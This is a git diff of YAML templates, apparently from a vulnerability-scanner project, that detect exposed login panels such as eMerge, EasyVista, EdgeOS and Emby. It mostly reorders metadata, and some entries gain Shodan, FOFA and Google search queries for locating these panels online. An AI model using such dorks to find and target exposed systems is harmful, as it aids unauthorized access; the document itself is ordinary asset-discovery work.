b/http/exposed-panels/eMerge-panel.yaml index 5fe66b3470..2691ddcbaf 100644 --- a/http/exposed-panels/eMerge-panel.yaml +++ b/http/exposed-panels/eMerge-panel.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: linear_emerge_essential_firmware - shodan-query: http.title:"eMerge" - vendor: nortekcontrol verified: true + max-request: 1 + vendor: nortekcontrol + product: linear_emerge_essential_firmware + shodan-query: + - http.title:"eMerge" + - http.title:"emerge" + fofa-query: title="emerge" + google-query: intitle:"emerge" tags: panel,emerge,nortek,nortekcontrol http: @@ -34,4 +38,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202741494f2b90dd4279180d8809c9d606c2f428ec5c485afb56b2c9743909949002205639cc8d8c825670a1fdf09df8086b67c454fcd7bc6dd0dd27d97fb0439e093a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d102c7378a649fa622bc08356dbe7087cd7354d66b554576f8f700a076d5abbf022078e0fd4cb7b807be7ce5fd82ff99e0660e45dd250e3c0796241b509d459da907:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/earcu-panel.yaml b/http/exposed-panels/earcu-panel.yaml index 6b052bed06..b188bf8f4f 100644 --- a/http/exposed-panels/earcu-panel.yaml +++ b/http/exposed-panels/earcu-panel.yaml @@ -8,9 +8,9 @@ info: reference: - https://www.earcu.com/products metadata: + verified: "true" max-request: 1 shodan-query: html:'content="eArcu' - verified: "true" tags: panel,earcu,detect http: @@ -38,4 +38,4 @@ http: group: 1 regex: - '(?:eav=)([0-9]+\.[0-9]+)' -# digest: 490a004630440220174ced87f9e2e953edbe5e5f8bf0fe0aba31579dd70671ff716ec6258ee8b3cb022060115e6470a9dd9d3e78fb6ea609445b9c3cb1676796baad1f7d5714dc3eefc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100929c459389eac91150fe7870074397b36842fc14e4e933f2238ded85b643766b02201fa87d1d47042c35836070a8e8e7c128890fe77d1a4d44be031af91bb7573ffc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/easyjob-panel.yaml b/http/exposed-panels/easyjob-panel.yaml index 37bf2e096b..7825fb725a 100644 --- a/http/exposed-panels/easyjob-panel.yaml +++ b/http/exposed-panels/easyjob-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.en.because-software.com/software/easyjob/ metadata: + verified: true max-request: 1 shodan-query: http.title:"Log in - easyJOB" - verified: true tags: panel,easyjob,login http: @@ -32,4 +32,4 @@ http: group: 1 regex: - 'easyJOB\s+([0-9.]+)' -# digest: 4b0a00483046022100983db9c387a5612277a7b250c8c8f0ffb74961f618b76ac21d4356615a5f5ef2022100aba93e494fa559c7410095129601d88d8712687ca1649b5335ef8d067143e661:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204ac1dbd6e9f346a5dec6e8654a7250bf43e78090f6a5935f79406627cb25e5db02203c3aa2293541b17ce6453a09710a0830c6e1ec58e73249d8d4fcf548585965c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/easyvista-panel.yaml b/http/exposed-panels/easyvista-panel.yaml index 7429e53e96..fb60e04b8b 100644 --- a/http/exposed-panels/easyvista-panel.yaml +++ b/http/exposed-panels/easyvista-panel.yaml @@ -1,19 +1,19 @@ id: easyvista-panel -info: - name: EasyVista Login Panel - Detect - author: righettod - severity: info - description: | - EasyVista login panel was detected. - reference: - - https://www.easyvista.com/ - metadata: - max-request: 1 - verified: true - shodan-query: http.title:"Easyvista" - tags: panel,easyvista,login,detect - +info: + name: EasyVista Login Panel - Detect + author: righettod + severity: info + description: | + EasyVista login panel was detected. + reference: + - https://www.easyvista.com/ + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"Easyvista" + tags: panel,easyvista,login,detect + http: - method: GET path: @@ -33,4 +33,4 @@ http: regex: - '(?i)package:\s+"([a-z0-9._-]+)"' - '(?i)version : ([a-z0-9._-]+)' -# digest: 4a0a0047304502202e940a0d921638b03da755b8b6961674e2218da0b375b10c31c34de9181b8c7f022100fb7c93a0c82f313e5ace2cca365dc8d7b6c769efd178287dfd89795b47505360:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d3dc30104b4c0d61c1431836cdf8c44423dc34f21c5b2aea898f6e7360ed7c9a022017b7cf2294fabeca4f157ad0afffe0dbdc01aee8dc06c1436588fa2099622997:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/eclipse-birt-panel.yaml b/http/exposed-panels/eclipse-birt-panel.yaml index 8586bce1e6..0d711e9a26 100644 --- a/http/exposed-panels/eclipse-birt-panel.yaml +++ b/http/exposed-panels/eclipse-birt-panel.yaml @@ -11,10 +11,10 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intitle:"Eclipse BIRT Home" + verified: true max-request: 2 shodan-query: title:"Eclipse BIRT Home" - verified: true + google-query: intitle:"Eclipse BIRT Home" tags: panel,eclipsebirt,detect http: @@ -46,4 +46,4 @@ http: group: 1 regex: - 'Viewer Version : ([0-9.-]+)' -# digest: 4a0a0047304502206245bc78ee75415dfd659cfe848aeffb147c107c515c672794a3d32d3ed066a702210089b4aff343e511b47a04ddfb558b1d2d911a5665bffe7775d3bd10587059c5e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bac974de8aad2121a7c20001a98a4529efc8403fa35c7a8a467f2fd31f58d2a9022100f7e3c06ec40a41ff7cfce14520a7d36e5f1f2bd8563da22b83e07e9b04ccbe9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/edgeos-login.yaml b/http/exposed-panels/edgeos-login.yaml index 1fd6c668f9..730723816c 100644 --- a/http/exposed-panels/edgeos-login.yaml +++ b/http/exposed-panels/edgeos-login.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:o:ui:edgeos:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: edgeos vendor: ui + product: edgeos tags: login,tech,edgeos,edgemax,panel,ui http: @@ -30,4 +30,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a33af4c1bb592006a260d6d4a3ac60d3222998793ee30fa2aa39b43853d2be12022100be33543d473a95d3306ba3a5d7f0cbe69b45b3fae141b9900e392c0bc6e6e350:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b5b5752ba3ea6c7e5630826c75ca0b2c39d70f0104991aed9910bc43918dbc91022100f95d8cf0794ea190ce7cc5d03978e5a80844f85e5d1346ee32a6b628da34339f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/efak-login-panel.yaml b/http/exposed-panels/efak-login-panel.yaml index 3a03a2f5b8..a1e8043326 100644 --- a/http/exposed-panels/efak-login-panel.yaml +++ b/http/exposed-panels/efak-login-panel.yaml @@ -10,9 +10,9 @@ info: - https://github.com/smartloli/efak - https://www.kafka-eagle.org/ metadata: + verified: true max-request: 2 shodan-query: http.favicon.hash:1693580324 - verified: true tags: panel,efak,login,detect http: @@ -37,4 +37,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c4a42108e1e4c469df96719d713da2d98a4b608798f3b1dfcffd9e1af86ff89d02201b9bac160ab721dd5a181bec4d33736163a17e9bc8ce0f473595a5470a0d2415:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b48ab7c62687c34edbc3d48d8a6a6b237f964710ea5b2ede5e230b199c70a1e60221008c4b819c96af52beae7acc8ad850d91a1c3a37856159e9552544acc0990d7809:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/eko-management-console-login.yaml b/http/exposed-panels/eko-management-console-login.yaml index 3a97680038..b2985b2765 100644 --- a/http/exposed-panels/eko-management-console-login.yaml +++ b/http/exposed-panels/eko-management-console-login.yaml @@ -11,10 +11,10 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intitle:"Charger Management Console" + verified: true max-request: 1 shodan-query: http.title:"Charger Management Console" - verified: true + google-query: intitle:"Charger Management Console" tags: panel,eko http: @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202a38bb1641b94ba5a56768b6a10431b61484c5dcd22456026598e41b492f158b022100a6c5ae8431ad4a805c226687f4ec1ebe3c871a1dd5d671555c742e262af68ec8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a64c9152ae2032af7e11ad9c615e79d06ff1089a1f60416f8f8780815fabaf390221009bca26ec2c0748b0edad595f8c3591a32b319e1ac7bcc95d5e48f71d4b6b42ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/eko-software-update-panel.yaml b/http/exposed-panels/eko-software-update-panel.yaml index d749fced04..6c52165c55 100644 --- a/http/exposed-panels/eko-software-update-panel.yaml +++ b/http/exposed-panels/eko-software-update-panel.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intitle:"Ekoenergetyka-Polska Sp. z o.o - CCU3 Software Update for Embedded Systems" max-request: 1 shodan-query: http.title:"Ekoenergetyka-Polska Sp. z o.o - CCU3 Software Update for Embedded Systems" + google-query: intitle:"Ekoenergetyka-Polska Sp. z o.o - CCU3 Software Update for Embedded Systems" tags: panel,eko http: @@ -31,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a3c8e9235a6512497eac490474b395f7545f3f1980d03f9e7ec3184ef02175a80220166c94ea9ec61e98967c08c62827617ac076dd6c95148f59713e458d6f3a7f1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a70410d5ca2790a06ac1810c934b1fac4e3876ec33d16e6bb434a2baff0060db02202222125ba9bc9ad0ef94a0be444aa02199f062363a61ee165aa8a6da4df86518:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/elemiz-network-manager.yaml b/http/exposed-panels/elemiz-network-manager.yaml index c2d4b796b0..ab6c1154ec 100644 --- a/http/exposed-panels/elemiz-network-manager.yaml +++ b/http/exposed-panels/elemiz-network-manager.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Elemiz Network Manager" - verified: true tags: elemiz,manager,login,panel http: @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dbbc8300fad3e74373b57ffe713c3c8b6f6e9a798c25807e83610fe73dc373100221008ffe951dd17ba7929030344061e25d0667316fff18f852dfdd07a661c03c0660:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ff7e2e092b0f60b91803dd48193ea1eda94c01e893d7666c5602ae9016d52c820220654e6382fcf83ece7e83b09afbfc499296c406e9884bdbc84393f8b91c266bfb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/emby-panel.yaml b/http/exposed-panels/emby-panel.yaml index 59824ba5be..8aa592eb42 100644 --- a/http/exposed-panels/emby-panel.yaml +++ b/http/exposed-panels/emby-panel.yaml @@ -14,11 +14,13 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:emby:emby:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: emby product: emby shodan-query: http.title:"emby" - vendor: emby - verified: true + fofa-query: title="emby" + google-query: intitle:"emby" tags: panel,emby,oss http: @@ -46,4 +48,4 @@ http: group: 1 regex: - '